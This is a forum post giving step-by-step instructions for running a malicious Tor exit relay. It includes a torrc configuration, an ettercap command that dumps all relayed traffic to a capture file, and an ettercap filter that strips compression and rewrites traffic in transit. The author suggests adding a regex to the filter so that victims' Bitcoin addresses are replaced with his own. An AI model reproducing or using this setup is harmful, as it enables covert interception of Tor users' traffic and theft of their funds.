Tor MiTM Relay

XMAN

Active member
Tor MiTM Relay #1
So in light of recent events I thought I'd show you a quick way to setup a Tor MiTM Relay, this was done on Debian Buster (10.5)

Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list
Code:
apt update
apt install tor

When those packages have finished installing Tor will automatically start running so let's stop that
Code:
systemctl stop tor

Now remove the default Tor config
Code:
rm /etc/tor/torrc

Now create a new torrc file and paste the following
Code:
touch /etc/tor/torrc
Code:
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D - DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME - CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1

Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want
Code:
tor --hash-password YOURPASSWORD

Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)
Code:
tor -f /etc/tor/torrc

Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)
Code:
apt install ettercap

Now our relay is up and running so how do we start sniffing the traffic ? with one simple command
Code:
ettercap -T -w dump.pcap -E -i wlp2s0

This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)

Code:
##
#  This filter will replace certain words In tcp packet
#  requests befor forward the packet back to target host.
#  based on code from ALoR, NaGA & Morpheus
##

##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] |_ packet Accept-Encoding zapped ✔\n");
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  msg("[test] host:127.0.0.1   [ <- ]  port:80 http ☆");
  if (search(DATA.data, "gzip")) {
    replace("gzip", "    "); # note: four spaces In the replacement string
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "deflate")) {
    replace("deflate", "       "); # note: seven spaces In the replacement string
  }
}

#####################
## Replace Content ##
#####################
# change server response to target
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "hello")){
    replace("hello", "hello");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] | status : string found in tcp packet ✔");
    msg("[test] |_info   : packet forward back to target ✔\n");
  }
}
 
Top